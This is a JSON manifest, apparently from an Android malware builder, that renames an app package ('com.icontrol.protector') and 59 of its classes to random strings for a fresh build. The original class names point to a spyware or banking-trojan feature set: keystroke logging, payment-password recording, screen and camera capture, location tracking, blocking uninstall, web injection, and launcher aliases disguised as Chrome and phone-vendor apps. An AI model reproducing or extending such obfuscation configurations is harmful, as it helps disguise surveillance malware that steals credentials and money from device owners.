{
  "src": "/www/wwwroot/al.s2e7.my/private/apkstub/apkstub_master",
  "dst": "/www/wwwroot/al.s2e7.my/private/apkstub/apkstub",
  "seed": 1263542351,
  "old_pkg": "com.icontrol.protector",
  "new_pkg": "com.vknnolqo.p9sv5zvf",
  "old_perm": "com.icontrol.protector.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION",
  "new_perm": "com.vknnolqo.p9sv5zvf.ZJYWLNXAQTLVTRMFEERK_PERMISSION",
  "class_count": 59,
  "class_map": {
    "A1": "CRnIc1Oh",
    "AccessServices": "SM099EXd",
    "AccessibilityActivity": "OKPcLYfw",
    "ActivMain": "Zw20l03q",
    "ActivityCaptureScreen": "R2nsO1AJ",
    "AlertActivity": "CNCIf1Pl",
    "BatteryOptimHelper": "CZDKmH9g",
    "BootReceiver": "TynQueAe",
    "BrodcastActivity": "X9mxyQZH",
    "CameraCap": "LrdeKHXS",
    "ChromeLauncherAlias": "MrqQlnVD",
    "EngineWorker": "GJhyvSVC",
    "HiddenActivity": "Lxz2iPzA",
    "LiveChat": "CtKus0KT",
    "LiveKeysStrok": "JhyDYeh2",
    "LocationMonitor": "O3t1U4u4",
    "LockActivity": "PEEXciYa",
    "MuteActivity": "WLVDI81d",
    "MuteUninstall": "A5oWPwNw",
    "MyJobService": "TKfY7U0i",
    "MyWorker": "ADl7zrLG",
    "My_Configs": "BuZckswr",
    "NotifyListenService": "GuKxlmq8",
    "OppoLauncherAlias": "T9NhgAl1",
    "PermissionsActivity": "FtJVk3Ba",
    "RecordPayPassWord": "ImOF4lTx",
    "ResetServices": "JKni6WzN",
    "SIMLauncherAlias": "PXdInoae",
    "ScreenCaps": "IOno9lNa",
    "TransparentActivity": "OBCly5H1",
    "TransparentLauncherAlias": "R7DVYrvo",
    "VivoLauncherAlias": "XlJdgTTE",
    "Webjector": "JB4M6sys",
    "WorkServices": "GBPjHfKu",
    "a": "MtokN1ft",
    "b": "ONyd6pB3",
    "c": "T4NnkYgB",
    "d": "SgAi2Jdf",
    "e": "HhmXUb1k",
    "f": "O2DAZ4XT",
    "g": "DnVSEOyK",
    "h": "YidxNjm8",
    "i": "QZOTyd0j",
    "j": "H8x3PkOt",
    "k": "WDvLfaWq",
    "l": "I6CeHbgU",
    "m": "JQgPaybB",
    "n": "DW1I4CnR",
    "o": "Fn3BAL6M",
    "p": "TGnosvod",
    "q": "FzrBpDYm",
    "r": "WVlps9ik",
    "s": "BUop2ImL",
    "t": "XoQZQbM9",
    "u": "DTWFHzpK",
    "v": "CpSLnKGE",
    "w": "TEh82iEU",
    "x": "OPJ5Xyvl",
    "y": "F9v6QVyX"
  }
}